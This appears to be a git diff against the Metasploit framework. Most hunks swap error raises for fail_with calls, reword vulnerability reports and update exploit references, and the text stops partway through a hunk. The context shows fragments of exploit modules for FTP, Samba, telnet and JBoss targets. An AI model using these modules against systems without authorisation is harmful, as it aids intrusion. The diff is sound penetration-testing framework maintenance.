diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb
index a041d2488b..14587cb43a 100644
--- a/modules/auxiliary/scanner/http/options.rb
+++ b/modules/auxiliary/scanner/http/options.rb
@@ -67,8 +67,8 @@ class Metasploit3 < Msf::Auxiliary
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => res.headers['Allow'],
+ :name => "HTTP Trace Method Allowed",
+ :info => "Module #{self.fullname} detected TRACE access through the Allow header: #{res.headers['Allow']}",
:refs => self.references,
:exploited_at => Time.now.utc
)
diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
index 50c3e76d23..24cc5c5cf0 100644
--- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
+++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'Reverse Proxy Bypass Scanner',
+ 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner',
'Version' => '$Revision$',
'Description' => %q{
Scan for poorly configured reverse proxy servers.
@@ -66,15 +66,15 @@ class Metasploit4 < Msf::Auxiliary
end
if response.nil?
- vprint_error "Request against #{host} timed out"
+ vprint_error "#{rhost}:#{rport} Request timed out"
return nil
end
seconds_transpired = (responded_at - requested_at).to_f
- vprint_status "#{host} took #{seconds_transpired} seconds to respond to URI #{uri}"
+ vprint_status "#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}"
status_code = response.code
- vprint_status "#{host} responded with status code #{status_code} to URI #{uri}"
+ vprint_status "#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}"
return {
:requested_at => requested_at,
@@ -92,7 +92,7 @@ class Metasploit4 < Msf::Auxiliary
end
if baseline[:status_code] == test_status_code
- vprint_error "The baseline status code for #{host} matches our test's"
+ vprint_error "#{rhost}:#{rport} The baseline status code for #{host} matches our test's"
return
end
@@ -101,13 +101,14 @@ class Metasploit4 < Msf::Auxiliary
status_code = injection_info[:status_code]
if status_code == test_status_code
- print_good "#{host}:#{rport} is vulnerable!"
+ print_good "#{rhost}:#{rport} Server appears to be vulnerable!"
report_vuln(
:host => host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "Returned #{status_code} when requested #{uri}",
+ :sname => ssl ? 'https' : 'http',
+ :name => self.name,
+ :info => "Module #{self.fullname} obtained #{status_code} when requesting #{uri}",
:refs => self.references,
:exploited_at => injection_info[:requested_at]
)
diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
index 8493ee53ab..19a3c08d8d 100644
--- a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
+++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
@@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'VMware Server Directory Transversal Vulnerability',
+ 'Name' => 'VMware Server Directory Traversal Vulnerability',
'Version' => '$Revision$',
- 'Description' => 'This modules exploits the VMware Server Directory traversal
+ 'Description' => 'This modules exploits the VMware Server Directory Traversal
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
allows remote attackers to read arbitrary files. Common VMware server ports
@@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
:host => target_host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => res.code,
+ :name => self.name,
+ :info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
:refs => self.references,
:exploited_at => Time.now.utc
}
diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb
index 4c23f6bf72..c5c7c0b936 100644
--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'Java RMI Server Endpoint Scanner',
+ 'Name' => 'Java RMI Server Insecure Endpoint Code Execution Scanner',
'Version' => '$Revision$',
'Description' => 'Detect Java RMI endpoints',
'Author' => ['mihi', 'hdm'],
@@ -95,14 +95,12 @@ class Metasploit3 < Msf::Auxiliary
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Disabled")
elsif buf.length > 0
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Enabled")
- report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Enabled")
+ svc = report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Enabled")
report_vuln(
:host => rhost,
- :port => rport,
- :proto => 'tcp',
- :sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => "Class Loader: Enabled",
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed remote code execution via this RMI service",
:refs => self.references
)
else
diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb
index 6a0b2e27e1..8ba017177e 100644
--- a/modules/auxiliary/scanner/mysql/mysql_version.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_version.rb
@@ -44,6 +44,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
rescue ::Rex::ConnectionError, ::EOFError
+ vprint_error("#{rhost}:#{rport} - Connection failed")
return
rescue ::Exception
print_error("Error: #{$!}")
diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
index bf9f49d80c..d51ef25f64 100644
--- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
# This makes db_services look a lot nicer.
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
- report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_sanitized)
+ svc = report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_sanitized)
# Check for encryption option ( IS(0) DES_CFB64(1) )
sock.put("\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0")
@@ -124,12 +124,11 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{ip}:#{rport} VULNERABLE: #{banner_sanitized}")
report_vuln(
{
- :host => ip,
- :port => rport,
- :proto => 'tcp',
- :name => self.fullname,
- :info => banner_sanitized,
- :refs => self.references
+ :host => ip,
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed acceptance of a long key ID: #{banner_sanitized}",
+ :refs => self.references
}
)
diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
index d7a9166525..3de1c52f95 100644
--- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
ver = "#{vnc.majver}.#{vnc.minver}"
print_status("#{target_host}:#{rport}, VNC server protocol version : #{ver}")
- report_service(
+ svc = report_service(
:host => rhost,
:port => rport,
:proto => 'tcp',
@@ -77,12 +77,11 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{target_host}:#{rport}, VNC server security types includes None, free access!")
report_vuln(
{
- :host => rhost,
- :port => rport,
- :proto => 'tcp',
- :name => self.fullname,
- :info => sec_type.join(","),
- :refs => self.references,
+ :host => rhost,
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} identified the VNC 'none' security type: #{sec_type.join(", ")}",
+ :refs => self.references,
:exploited_at => Time.now.utc
})
end
diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb
index a6b55d4128..e261a8d128 100644
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary
when /rv:([\d\.]+)/
ua_name = 'FF'
ua_vers = $1
- when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/
+ when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]+\.[0-9]+)/
ua_name = 'IE'
ua_vers = $1
when /Version\/(\d+\.\d+\.\d+).*Safari/
diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb
index 4af33dea5f..9cfb1947ca 100644
--- a/modules/encoders/x86/alpha_mixed.rb
+++ b/modules/encoders/x86/alpha_mixed.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
# Configure SEH getpc code on Windows
#
def init_platform(platform)
- if(::Msf::Module::PlatformList.from_a(platform).supports?(::Msf::Module::PlatformList.win32))
+ if(platform.supports?(::Msf::Module::PlatformList.win32))
datastore['AllowWin32SEH'] = true
end
end
diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb
index 1cec6d4be0..a8fb6c4567 100644
--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
if (not sunrpc_create('udp', 100068, 4))
- raise RuntimeError, 'sunrpc_create failed'
+ fail_with(Exploit::Failure::Unknown, 'sunrpc_create failed')
end
# spray the heap a bit (work around powerpc cache issues)
diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb
index e8c20766ec..085b11fe93 100644
--- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb
+++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => datastore['URI']
}, 5)
@mercantec = (res and res.body and res.body =~ /Copyright.*Mercantec/)
- raise RuntimeError, "The target is not a Mercantec CGI" if not @mercantec
+ fail_with(Exploit::Failure::NotFound, "The target is not a Mercantec CGI") if not @mercantec
end
buffer =
diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
index 107a1c26be..00ab7533ca 100644
--- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -165,14 +165,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not @mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{@mytarget.name}")
pl = exploit_regenerate_payload(@mytarget.platform, arch)
if not pl
- raise RuntimeError, 'Unable to regenerate payload!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to regenerate payload!')
end
else
print_status("Trying target #{@mytarget.name}...")
diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
index 42e6a06a62..1cdb253478 100644
--- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
- raise RuntimeError, "This system does not support encryption"
+ fail_with(Exploit::Failure::Unknown, "This system does not support encryption")
end
break if data.index("\xff\xfa\x26\x02\x01")
end
diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb
index 57646a8162..56615ba85b 100644
--- a/modules/exploits/linux/ftp/proftp_sreplace.rb
+++ b/modules/exploits/linux/ftp/proftp_sreplace.rb
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
pwd = send_cmd(['PWD'])
if pwd !~ /257\s\"(.+)\"/
- raise RuntimeError, "Unable to get current working directory"
+ fail_with(Exploit::Failure::Unknown, "Unable to get current working directory")
end
pwd = $1
pwd << "/" if pwd[-1,1] != "/"
diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb
index 4a66140e0c..6704b33697 100644
--- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -388,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Make sure we didn't introduce instability
addr_badchars = "\x09\x0a\x0b\x0c\x20"
if idx = Rex::Text.badchar_index(addrs, addr_badchars)
- raise RuntimeError, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx])
+ fail_with(Exploit::Failure::Unknown, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]))
end
buf << addrs
@@ -437,7 +437,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not session_created?
- raise RuntimeError, "Unable to guess the cookie value, sorry :-/"
+ fail_with(Exploit::Failure::Unknown, "Unable to guess the cookie value, sorry :-/")
end
else
sock.put(buf)
diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
index 98b35ff2f7..ca5136397e 100644
--- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
+++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2765' ],
[ 'OSVDB', '55990' ],
[ 'BID', '35742' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
+ [ 'EDB', '9209' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb
index 553f7ecfa1..fe683d76fb 100644
--- a/modules/exploits/linux/imap/imap_uw_lsub.rb
+++ b/modules/exploits/linux/imap/imap_uw_lsub.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2000-0284' ],
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/284' ],
+ [ 'EDB', '284' ]
],
'Privileged' => false,
'Payload' =>
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying 0x%.8x ..." % addresses['Ret'])
if (not connect_login)
- raise RuntimeError, "Unable to log in!"
+ fail_with(Exploit::Failure::Unknown, "Unable to log in!")
end
req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
index 6518670f72..c2b40605ef 100644
--- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
+++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
@@ -349,7 +349,7 @@ EOS
#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',')
if (len == 24 and value.length != 198)
- raise "Value is too big! #{value.length}"
+ fail_with(Exploit::Failure::BadConfig, "Value is too big! #{value.length}")
end
buf = "\xdd" + value.length.chr + value
diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb
index 509e4458b0..d03c95e781 100644
--- a/modules/exploits/linux/misc/gld_postfix.rb
+++ b/modules/exploits/linux/misc/gld_postfix.rb
@@ -35,7 +35,7 @@ require 'msf/core'
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
+ [ 'EDB', '934' ]
],
'Privileged' => true,
'License' => MSF_LICENSE,
diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb
index 0115b6833c..fcd1b00bf4 100644
--- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb
+++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (buf = sock.get_once(-1, 5) || '')
#print_status("\n" + Rex::Text.to_hex_dump(buf))
if (buf =~ /is not allowed to connect/)
- raise RuntimeError, 'The server refused our connection!'
+ fail_with(Exploit::Failure::Unreachable, 'The server refused our connection!')
end
len1,cmd = buf[0,5].unpack('VC')
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
if (not mytarget)
- raise RuntimeError, 'Unable to detect target automatically'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect target automatically')
else
print_status("Using automatically detected target: #{mytarget.name}")
end
diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb
index 514c7cd105..d985f735ce 100644
--- a/modules/exploits/linux/samba/lsa_transnames_heap.rb
+++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb
@@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
if ! @checked_peerlm
if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i
- raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb
index 3dae2c66cd..a141e9a0a5 100644
--- a/modules/exploits/linux/samba/trans2open.rb
+++ b/modules/exploits/linux/samba/trans2open.rb
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
if ! @checked_peerlm
if smb_peer_lm !~ /samba/i
- raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
end
if smb_peer_lm =~ /Samba [34]\./i
- raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
index 3629886e6b..6e997f8dc5 100644
--- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
- raise RuntimeError, "This system does not support encryption"
+ fail_with(Exploit::Failure::Unknown, "This system does not support encryption")
end
break if data.index("\xff\xfa\x26\x02\x01")
end
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index 409e129b9c..53eab16fcc 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
data_dir = File.join(Msf::Config.data_directory, "exploits", self.shortname)
if datastore["APPLETNAME"]
unless datastore["APPLETNAME"] =~ /^[a-zA-Z_$]+[a-zA-Z0-9_$]*$/
- raise ArgumentError.new("APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)")
+ fail_with(Exploit::Failure::BadConfig, "APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)")
end
siteloader = File.open(File.join(data_dir, "SiteLoader.class"), "rb") {|fd| fd.read(fd.stat.size) }
# Java strings are prefixed with a 2-byte, big endian length
@@ -272,19 +272,19 @@ The following stores a bunch of intermediate files on the path to creating the s
ImportKey class used for testing was obtained from:
http://www.agentbob.info/agentbob/79-AB.html
- system("rm -rf signed_crap/*")
- File.open("signed_crap/cert.pem", "wb") { |f| f.write(@cert.to_s + @key.to_s) }
- File.open("signed_crap/key.pem", "wb") { |f| f.write(@key.to_s + @key.public_key.to_s) }
- File.open("signed_crap/unsigned.jar", "wb") { |f| f.write jar.to_s }
+ system("rm -rf signed_jar/*")
+ File.open("signed_jar/cert.pem", "wb") { |f| f.write(@cert.to_s + @key.to_s) }
+ File.open("signed_jar/key.pem", "wb") { |f| f.write(@key.to_s + @key.public_key.to_s) }
+ File.open("signed_jar/unsigned.jar", "wb") { |f| f.write jar.to_s }
- File.open("signed_crap/jarsigner-signed.jar", "wb") { |f| f.write jar.to_s }
- system("openssl x509 -in signed_crap/cert.pem -inform PEM -out signed_crap/cert.der -outform DER")
- system("openssl pkcs8 -topk8 -nocrypt -in signed_crap/key.pem -inform PEM -out signed_crap/key.der -outform DER")
- system("java -cp . ImportKey signed_crap/key.der signed_crap/cert.der")
+ File.open("signed_jar/jarsigner-signed.jar", "wb") { |f| f.write jar.to_s }
+ system("openssl x509 -in signed_jar/cert.pem -inform PEM -out signed_jar/cert.der -outform DER")
+ system("openssl pkcs8 -topk8 -nocrypt -in signed_jar/key.pem -inform PEM -out signed_jar/key.der -outform DER")
+ system("java -cp . ImportKey signed_jar/key.der signed_jar/cert.der")
system("mv ~/keystore.ImportKey ~/.keystore")
- system("jarsigner -storepass importkey signed_crap/jarsigner-signed.jar importkey")
+ system("jarsigner -storepass importkey signed_jar/jarsigner-signed.jar importkey")
jar.sign(@key, @cert)
- File.open("signed_crap/signed.jar", "wb") { |f| f.write jar.to_s }
+ File.open("signed_jar/signed.jar", "wb") { |f| f.write jar.to_s }
=end
diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
index effbd9d402..b1ffcfd64d 100644
--- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
+++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if (not connect_login)
- raise RuntimeError, 'Unable to authenticate'
+ fail_with(Exploit::Failure::Unknown, 'Unable to authenticate')
end
# Use a copy of the target
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
# detect the number of pad bytes
idx = stack_data.index("aaaabbbb")
if not idx
- raise RuntimeError, "Whoa, didn't find the static bytes on the stack!"
+ fail_with(Exploit::Failure::Unknown, "Whoa, didn't find the static bytes on the stack!")
end
num_pad = 0
num_pad = 4 - (idx % 4) if (idx % 4) > 0
@@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
fmtbuf.gsub!(/\xff/, "\xff\xff")
if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))
if res[0,4] == "500 "
- raise RuntimeError, "Crap! Something went wrong when uploading the payload..."
+ fail_with(Exploit::Failure::Unknown, "Something went wrong when uploading the payload...")
end
end
end
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
index dae7ce988d..05849ad767 100644
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if not datastore['ExitOnSession'] and not job_id
- raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)"
+ fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
stime = Time.now.to_f
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 0bd38d8f8b..d3ccf279f8 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -609,9 +609,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Getting information to undeploy...")
viewstate, entry = get_delete_info(session, version, app_base)
if (not viewstate)
- raise RuntimeError, "Unable to get viewstate"
+ fail_with(Exploit::Failure::Unknown, "Unable to get viewstate")
elsif (not entry)
- raise RuntimeError, "Unable to get entry"
+ fail_with(Exploit::Failure::Unknown, "Unable to get entry")
end
print_status("Undeploying #{app_base}...")
@@ -807,7 +807,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Set target
mytarget = target
mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
- raise RunTimeError, "Unable to automatically select a target" if (not mytarget)
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target") if (not mytarget)
#Generate payload
p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb
index b93d5c6346..4acd1a97ac 100644
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
if datastore['SHELL'] == 'auto'
if verb != 'HEAD'
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("SHELL set to #{datastore['SHELL']}")
else
- raise RuntimeError, 'Platform detection with HEAD is not supported, please set SHELL manually'
+ fail_with(Exploit::Failure::NoTarget, 'Platform detection with HEAD is not supported, please set SHELL manually')
end
# Payload generation already happened, therefore SHELL will
@@ -146,15 +146,17 @@ EOT
print_status("Attempting to use '#{p}' as package")
res = invoke_bshscript(bsh_script, p, verb)
if !res
- raise RuntimeError, "Unable to deploy WAR [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR [No Response]")
end
if (res.code < 200 || res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
+ fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
print_error("Upload to deploy WAR [#{res.code} #{res.message}]")
+ fail_with(Exploit::Failure::Unknown, "Invalid reply: #{res.code} #{res.message}")
else
success = true
pkg = p
@@ -163,7 +165,7 @@ EOT
end
if not success
- raise RuntimeError("Deployment failed")
+ fail_with(Exploit::Failure::Unknown, "Failed to deploy the WAR payload")
end
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
index 350953acd7..d480588587 100644
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = payload
if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index 16c5eb8fa5..0a65abb0e2 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting to automatically select a target...")
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
# TODO: detection requires HTML parsing
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.name =~ /Automatic/)
mytarget = auto_target()
if (not mytarget)
- raise RuntimeError, "Unable to automatically select a target"
